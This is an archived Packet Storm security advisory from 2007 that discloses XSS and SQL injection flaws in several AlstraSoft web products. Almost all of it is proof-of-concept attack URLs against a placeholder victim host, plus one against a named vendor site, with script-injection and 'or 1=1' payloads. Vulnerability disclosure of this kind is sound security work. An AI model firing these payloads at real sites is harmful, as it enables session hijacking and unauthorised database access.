what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

alstrasoft-multi.txt

alstrasoft-multi.txt
Posted Jul 23, 2007
Authored by Lostmon | Site lostmon.blogspot.com

A number of cross site scripting and SQL injection vulnerabilities affect various products from AlstraSoft including Video Share Enterprise, Text Ads Enterprise, SMS Text Messaging Enterprise, Affiliate Network Pro, Article Manager Pro, and AskMe Pro.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | dc6daac339055624b32c31104884c5c2c701f74e23323cec7c2aa98c2ad180d5

alstrasoft-multi.txt

Change Mirror Download
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
####################################################



Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks



################
examples
################

For exploit some flaws you need to login
multiple other variables are afected y all products :S

#####################################
AlstraSoft Video Share Enterprise
#####################################


http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>

http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr

http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=

http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>

http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>

http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>


http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search

http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>


path disclosure:

http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>

http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>

http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'

http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>

http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>

SQL injection :

http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1

http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1



###########################################
AlstraSoft Text Ads Enterprise
###########################################

http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>

http://[Victim]/ads/search_results.php?query="><script>alert()</script>

http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>

http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>


#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################


http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>

http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit


#################################################
e-friends

http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>

this is a persistent XSS


########################################
AlstraSoft Affiliate Network Pro
########################################

http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS

http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act

http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub

http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too

http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=

####################################
AlstraSoft Article Manager Pro
####################################

http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>

#######################################
AlstraSoft AskMe Pro
#######################################

http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL

http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL

http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>

###################### €nd ########################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close